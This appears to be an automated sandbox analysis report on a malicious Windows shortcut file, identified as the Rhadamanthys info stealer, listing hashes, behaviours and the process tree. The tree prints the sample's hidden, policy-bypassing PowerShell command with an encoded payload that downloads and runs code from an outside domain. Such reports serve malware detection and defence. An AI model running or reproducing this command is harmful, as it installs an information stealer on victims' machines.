Analysis
-
max time kernel
147s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
05-04-2024 11:16
Static task
static1
Behavioral task
behavioral1
Sample
DOC692-692692.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
DOC692-692692.lnk
Resource
win10v2004-20240226-en
General
-
Target
DOC692-692692.lnk
-
Size
9KB
-
MD5
a344b567076691b5cd838512c99bc884
-
SHA1
0de4ad8f9f127c0c444bb7db4459d0977b1f6506
-
SHA256
decbd662ecab295cb2c060232a6de8218843d671b7cb628aaf769ba4bcdf126f
-
SHA512
ad6d3fed7647c933c9a23938f7c39a8799d5845cd6a9e1fec6d0a2044c740795d428e89467c4e5b1f8217217f272863438b68e160da312d6ae8498af9688dd98
-
SSDEEP
192:8z5phm3MSBfQbxE4l2g9FWV4FBno2dzSkbP43O5yrf68g493f61hVNeXkI:u5fcMS5Qb6EouFB3dzBbw3Omf68Zp9XV
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4960 created 2824 4960 powershell.exe sihost.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 4960 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exedialer.exepid process 4960 powershell.exe 4960 powershell.exe 4960 powershell.exe 4960 powershell.exe 3656 dialer.exe 3656 dialer.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4960 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 744 wrote to memory of 4960 744 cmd.exe powershell.exe PID 744 wrote to memory of 4960 744 cmd.exe powershell.exe PID 4960 wrote to memory of 3656 4960 powershell.exe dialer.exe PID 4960 wrote to memory of 3656 4960 powershell.exe dialer.exe PID 4960 wrote to memory of 3656 4960 powershell.exe dialer.exe PID 4960 wrote to memory of 3656 4960 powershell.exe dialer.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2824
-
C:\Windows\system32\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3656
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\DOC692-692692.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -WindowStyle Hidden -Enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBpAG0AYQBuAGkAawB1AHUALgBjAG8AbQAvAGQAbwBuAGUALgB0AHgAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAIAB8ACAAaQBOAHYATwBrAEUALQBFAHgAUAByAGUAUwBzAGkATwBuAA==2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4960
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82